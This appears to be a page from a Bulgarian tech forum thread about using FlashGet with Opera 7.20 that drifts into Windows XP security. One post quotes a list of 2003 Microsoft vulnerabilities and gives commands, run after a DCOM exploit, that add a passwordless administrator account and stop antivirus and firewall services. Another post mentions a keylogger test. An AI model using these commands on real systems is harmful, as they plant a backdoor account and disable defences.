Страница 2 от 2 ПърваПърва 12
Резултати от 16 до 26 от общо 26

FLASHGET & OPERA 7.20

Сподели във Facebook Сподели в Twitter Изпрати на Email Сподели в LinkedIn
  1. Gadget
    Guest
    #16

    FLASHGET & OPERA 7.20

    Или поне ти така си мислиш ))

  2.  
     
  3. Junior Member
    Тук е от
    Apr 2003
    Мнения
    14
    #17

    FLASHGET & OPERA 7.20

    Абе Gadget,

    Ясно ми е, че си разбрал IP-то ми- нямаше нужда да го пръскаш...

    Пак казвам- нямам нищо важно и никога не ми пречи да се преинсталирам точно за 7 минуте с NORTON GHOST-а, така че- не ме е страх.

    Въпросът ми е- като си хванал IP-то ми, можеш ли да човъркаш в компа ми каквото си поискаш?



    Как го правите бе, братлета...

  4. Member
    Тук е от
    Apr 2002
    Мнения
    256
    #18

    FLASHGET & OPERA 7.20

    - Скъсаха ме на математиката. - каза Чапаев. - Вътрешно го чувствувам, убеден съм, че 0,5 + 0,5 е цял литър, ама не можах да го докажа математически.

    ===========================================================



    Та и аз бях убеден, че Уйндоус XP и IExplorer са редки лайна. Но си мълчах, докато се докаже от самосебе си.



    Ето ви само с дата 16.10.2003:

    <blockquote id="quote"><font size="1" id="quote"><b id="quote">цитат:</b id="quote"></font id="quote"><table border="0" id="quote"><tr id="quote"><td class="quote" id="quote"><font size="1" id="quote">Удаленное переполнение буфера в Microsoft Windows в обработке HCP протокола (MS03-044)

    Переполнение буфера обнаружено в Microsoft Windows в обработке HCP протокола. Удаленный атакующий может выполнить произвольный код на уязвимой системе.



    Удаленное переполнение буфера в Messenger Service в Microsoft Windows NT/2000/XP/2003 (MS03-043)

    Переполнение буфера обнаружено в Messenger Service в Microsoft Windows. Удаленный атакующий может выполнить произвольный код на уязвимой системе.



    Удаленное переполнение буфера в SMTP службе в Microsoft Exchange 5.5/2000 (MS03-046)

    Переполнение буфера обнаружено в Microsoft Exchange 5.5/2000 в SMTP службе. Удаленный атакующий может вызвать отказ в обслуживании и выполнить произвольный код на уязвимом сервере (только Microsoft Exchange Server 2000).



    Неавторизованная установка ActiveX управления в Microsoft Windows 4.0/2000/XP/2003 (MS03-041)

    Уязвимость обнаружена в Microsoft Windows (Internet Explorer). Злонамеренный HTML документ может установить произвольное ActiveX управление.



    Переполнение буфера в Windows Troubleshooter ActiveX Control (MS03-042)

    Microsoft выпустила исправление, которое устраняет уязвимость в Windows Trouble Shooter ActiveX Control. Злонамеренный HTML документ, типа Web страницы или почтового HTML сообщения, может выполнить произвольный код на уязвимой системе.



    Переполнение буфера в функции User32.dll в Microsoft Windows 4.0/2000/XP/2003 (MS03-045)

    Уязвимость обнаружена в Microsoft Windows 4.0/2000/XP/2003. Злонамеренный локальный пользователь может поднять свои привилегии.



    Межсайтовый скриптинг в Microsoft Exchange (MS03-047)

    Уязвимость обнаружена в Microsoft Exchange. Удаленный атакующий может выполнить XSS нападение.



    Переполнение буфера в Microsoft Word

    Уязвимость обнаружена в Microsoft Word. Злонамеренный пользователь может выполнить произвольный код на уязвимой системе.

    </td id="quote"></tr id="quote"></table id="quote"></blockquote id="quote"><font size="2" id="quote"></font id="quote">



    Проверката дали кода е произволен съм я правил лично. Качих едно XP на G:\Razni\R\. Въпреки това DComExploit.exe успя да извика CMD.exe със System права и да го закачи на порт 4444, откъдето с Nc.exe команваш както ти е кеф.

    Код:
    net user injinera /add
    net localgroup Administrators injinera /add
    net user injinera /passwordreq:no 		;без Парола
    net stop "Norton Antivirus Service"
    net stop "Panda Antivirus"
    net stop "ZoneAlarm"


    И т.н.



    Още на 11.10.2003 излезе инфо, че и кръпка MS03-39 не спасява. Със 7-10% вероятност се пробиват и кърпените XP-та



    Аз ЕксПито и Интернет Иксплорера съм ги поставил на трупчета. Но акъла е различен от някои други работи и не подлежи на набиване.


  5. Gadget
    Guest
    #19

    FLASHGET & OPERA 7.20

    @revizoro: Няма смисъл да те коментирам, нека друг да ти обясни. Аз не съм компетентен, но без да искам съм ти налучкал IP-то



    @injinera: Ти все едно преоткри Америка... всяка седмища излиза кръпка за възможно изпълнение на код. Определено M$ в новите си Win версии са наблегнали на стабилността за сметка на сигурността



    <hr noshade size="1">



    Мисля че, достатъчно се отклонихме от темата. Ако няма какво да кажете повече по въпроса с Flashget + Opera е време да спрете

  6. Senior Member Аватара на ru-boy
    Тук е от
    Jan 2000
    Мнения
    4,531
    #20

    FLASHGET & OPERA 7.20

    <blockquote id="quote"><font size="1" id="quote"><b id="quote">цитат:</b id="quote"></font id="quote"><table border="0" id="quote"><tr id="quote"><td class="quote" id="quote"><font size="1" id="quote">Абе Gadget,

    Ясно ми е, че си разбрал IP-то ми- нямаше нужда да го пръскаш...

    Пак казвам- нямам нищо важно и никога не ми пречи да се преинсталирам точно за 7 минуте с NORTON GHOST-а, така че- не ме е страх.

    Въпросът ми е- като си хванал IP-то ми, можеш ли да човъркаш в компа ми каквото си поискаш?



    Как го правите бе, братлета...



    <div align="right">оргинално мнение на revizoro</div id="right">

    </td id="quote"></tr id="quote"></table id="quote"></blockquote id="quote"><font size="2" id="quote"></font id="quote">

    Айде, аз, ако може, да кажа.

    Инспектора ти знае IP-то, защото има админ. права в форума и IP ти се записва в лог. Като ти е хванал IP-то, това не значи, че може да ти "човърка" компютъра. Ако ползваш GFI NSS, ще се учудиш колко информация може да получиш за някого по неговото IP. Разбира се има и съответните защити за противодействие, но не искам да ги обсъждам тук.

  7. Gadget
    Guest
    #21

    FLASHGET & OPERA 7.20

    @ru-boy: Това, че имам админ права не значи, че съм се занимавал да му гледам IP-то. Аз и сега не му го знам. "revizoro" е погледнал сигнатурата ми и от нея си e направил изводи, но не е наясно как работи тя Затова казвам, че в случая съм некомпетентен

  8.  
     
  9. Member
    Тук е от
    Feb 2002
    Мнения
    179
    #22

    FLASHGET & OPERA 7.20

    reviziro: инсталираш си стария flashget plugin за opera 6.xx влизаш в настройките на opera 7.xx и правиш всичко както е на този screenshot. []







    хаха а за IP-то на revizoro май става въпрос за картинката от сигнатурата на Gadget. [:D]

  10. Junior Member
    Тук е от
    Apr 2003
    Мнения
    14
    #23

    FLASHGET & OPERA 7.20

    Гаджет, не знам дали си некомпетентен, ама аз си го признавам. Наистина не знам как работи сигнатурата ти, но това за IE 6 е абсолютно невярно. IE6 го намирам за пълна пръдня, а използвам OPERA 7, видно от заглавието на темата, по която наистина получих помощ, за което благодаря на всички.



    Баси изречението дето стана...

  11. Senior Member Аватара на ru-boy
    Тук е от
    Jan 2000
    Мнения
    4,531
    #24

    FLASHGET & OPERA 7.20

    <blockquote id="quote"><font size="1" id="quote"><b id="quote">цитат:</b id="quote"></font id="quote"><table border="0" id="quote"><tr id="quote"><td class="quote" id="quote"><font size="1" id="quote">@ru-boy: Това, че имам админ права не значи, че съм се занимавал да му гледам IP-то. Аз и сега не му го знам. "revizoro" е погледнал сигнатурата ми и от нея си e направил изводи, но не е наясно как работи тя Затова казвам, че в случая съм некомпетентен



    <div align="right">оргинално мнение на Gadget</div id="right">

    </td id="quote"></tr id="quote"></table id="quote"></blockquote id="quote"><font size="2" id="quote"></font id="quote">

    E, аз не предположих, че за това става дума [:I] и се хванах за прекия отговор []. А по въпроса с банерчето то е обществено достъпно на съответния адрес и е безплатно. Може да са сменят и животинките, по желание. Има дори и български превод, и показва само собственото IP, а не друго. Забавно е. []

    -----------

    А сега по темата (но не съвсем):

    Вчера прочетох в и-нет, че ако си оставиш опцията в ХР-то за сверяване на часа със сървърите на М$, то един път седмично това се случва и се изпраща допълнителна информация свързана с лиценза на уиндоуса, без знанието на потребителя. Това на мен не ми харесва, и е свързано само с ХР-то, може би и следващите версии.


  12. Member
    Тук е от
    Apr 2002
    Мнения
    256
    #25

    FLASHGET & OPERA 7.20

    <blockquote id="quote"><font size="1" id="quote"><b id="quote">цитат:</b id="quote"></font id="quote"><table border="0" id="quote"><tr id="quote"><td class="quote" id="quote"><font size="1" id="quote"> ако си оставиш опцията в ХР-то за сверяване на часа със сървърите на М$, то един път седмично това се случва и се изпраща допълнителна информация свързана с лиценза на уиндоуса, без знанието на потребителя.</td id="quote"></tr id="quote"></table id="quote"></blockquote id="quote"><font size="2" id="quote"></font id="quote">



    Работите са много по дебели.
    XP е правн с идеята, че ще слуша първо по мрежата, после потребителя. Бил Гей желае да ни стъпи на врата на всичките.

    ==============================================

    Отварянето на един документ с M$Word XP под XP е процес, зависим от DCOM. ЗАЩО? Този документ мой ли е или обществен?

    ==============================================



    Имайки предвид, как клубовете купиха 98, ЗАКОННА, а после се оказа, че не е и се изръсиха за XP, е очевидно, че Майкрософт са мръсници отвсякъде.



    За мен е непонятно как може да дадеш на мръснишкия браузър да се свързва към НЕТА. Само Господ и Бил Гей знаят какво мръснишката ОС приказва за теб през този браузър.



    Аз XP-то и IExplorer съм ги вдигнал на трупчета. Вие-както искате.

  13. Senior Member Аватара на ru-boy
    Тук е от
    Jan 2000
    Мнения
    4,531
    #26

    FLASHGET & OPERA 7.20

    Има една много хубава програма, която буквално ОРЯЗВА IE и другите и функции на ХР-то плюс много други по желание, така, че да може човек да ползва ХР-то спокойно. Програмата е XP Lite. Друго, обаче е по интересно. Монтирах си една програма (кей-логер) 123XPSpy. Опитах да въведа парола с on-screen keyboard и всеки път ми я прехващаше и щом прави това с on-screen keyboard, какво остава за нормалната клавиатура. И това не е всичко. Колкото пъти kill-на процеса на програмата, след 3-4 секунди пак се появява, без това да прекъсва работата на програмата. И какъв е смисъла от защитеното ми виртуално у/во, като всеки ще може да разгледа лога на програмата и да ми види паролата.

  14.  
     
Сподели във Facebook Сподели в Google Plus Сподели в Twitter Изпрати на Email Сподели в LinkedIn
Страница 2 от 2 ПърваПърва 12

Подобни теми

  1. Сваляне с FlashGet
    От Pat във форум Общ - софтуер
    Отговори: 11
    Последно: 21-05-06, 12:16
  2. FlashGet Проблем
    От JOJO във форум Общ - софтуер
    Отговори: 2
    Последно: 19-04-05, 13:53
  3. FlashGet въпрос
    От Aquadark във форум Общ - софтуер
    Отговори: 14
    Последно: 17-11-03, 16:36
  4. проблем с FlashGet
    От LZ4 във форум Общ - софтуер
    Отговори: 6
    Последно: 30-09-03, 18:09
  5. FlashGet
    От jax във форум Общ - софтуер
    Отговори: 6
    Последно: 17-02-03, 19:20

SetCombG.com
SetCombG.com е портален сайт и Форум за битова техника, телевизори, климатици, лаптопи и смартфони, създаден през 1999 година.
Заедно сме над 20 години!
Следвай ни
Горе